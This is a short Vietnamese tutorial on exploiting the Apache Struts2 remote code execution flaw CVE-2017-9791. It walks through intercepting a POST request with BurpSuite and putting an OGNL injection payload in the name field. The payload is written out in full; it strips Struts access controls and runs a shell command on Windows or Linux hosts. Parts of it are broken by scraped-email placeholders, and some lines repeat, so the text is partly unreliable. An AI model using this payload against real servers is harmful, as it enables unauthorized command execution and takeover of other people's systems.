Trong bài viết này mình sẽ hướng dẫn các bạn khai thác lỗ hổng remote code trong Apache Struts2.
Thông tin về lỗ hổng CVE-2017-9791, các bạn có thể tham khảo tại đây.
Demo
Thông tin về lỗ hổng CVE-2017-9791, các bạn có thể tham khảo tại đây.
- Tìm kiếm struts1 intergeration trên hệ thống apache server.
- Truy cập vào đường dẫn, như hình dưới
- Sử dụng BurpSuite để chặn và thay đổi POST request
- Thay đổi giá trị name bằng payload
%{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)
(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}
![[IMG]](https://lh3.googleusercontent.com/proxy/Ev2HXb5v6GKhXgAzB2WvuddJAbhAB5MadyHgye24UEayQLy5TAPN7rRqo7zUiJKPNF8=s0-d)
![[IMG]](https://lh6.googleusercontent.com/proxy/b_n5vLkbURrVrVgt4miRtEVVOFBOCX9b6WoL6uq87U3mIjOga_tdQwpzX8lD_MkL4lg=s0-d)
![[IMG]](https://lh5.googleusercontent.com/proxy/Wg37su5dkv3G3sjv-bL23bUVscanvHP-c6_j-1DwCUVT8xAq_-Qw7BEB7_AoOv0foNykb9d_PCgZxYNrZPjGBpWxbb6p0EAFBa_WGFofCDV3hzF-=s0-d)
![[IMG]](https://lh4.googleusercontent.com/proxy/quSxiJcvEbMIZT_BwOCezb9O4pdx55hp-GfiVAGAVYtXCO0mX5AK-8Ar6JsA6BwD5us=s0-d)
![[IMG]](https://lh3.googleusercontent.com/proxy/7fCY4940wWaEfIaWI25ktOfjK89Lv0xkWGkdloDOuDNjRzfAjIGnyy7YI5oHf3UDD4E=s0-d)
Demo